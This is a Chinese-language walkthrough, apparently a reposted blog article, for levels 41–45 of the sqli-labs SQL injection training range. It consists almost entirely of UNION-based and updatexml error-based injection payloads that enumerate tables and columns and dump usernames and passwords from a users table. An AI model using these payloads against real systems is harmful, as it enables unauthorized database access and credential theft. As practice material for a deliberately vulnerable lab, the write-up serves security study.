本文主要是介绍sqli-labs靶场通关攻略(四十一到四十五关),希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
sqli-labs-master靶场第四十一关
一,查看数据库
?id=-1 union select 1,2,database()--+
二,查看表名
?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
三,查看users表中列名
?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+
四,查看users表中信息
?id=-1 union select 1,2,group_concat(id,username,password) from users --+
sqli-labs-master靶场第四十二关
一,登录页面
二,查询数据库
密码框输入:'and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa
三,查看表名
密码框输入:'and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) --aaa
四,查看users表中列名
密码框输入:'and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1) -- aaa
sqli-labs-master靶场第四十三关
一,查询数据库
密码框输入:') and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa
二,查看表名
密码框输入:') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa
三,查看users表中列名
') and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users' ),0x7e),1) -- aaa
四,查看users表中信息
') union select 1,group_concat(username,password),3 from users -- aaa
sqli-labs-master靶场第四十四关
一,查询数据库
1' union select 1,database(),3 #
二,查看表名
1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
三,查看users表中列名
1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #
四,查看users表中信息
1' union select 1,group_concat(username,password),3 from users #
sqli-labs-master靶场第四十五关
一,查询数据库
1') union select 1,database(),3 #
二,查看表名
1') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #
三,查看users表中列名
1') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #
四,查看users表中信息
1') union select 1,group_concat(username,password),3 from users#
这篇关于sqli-labs靶场通关攻略(四十一到四十五关)的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!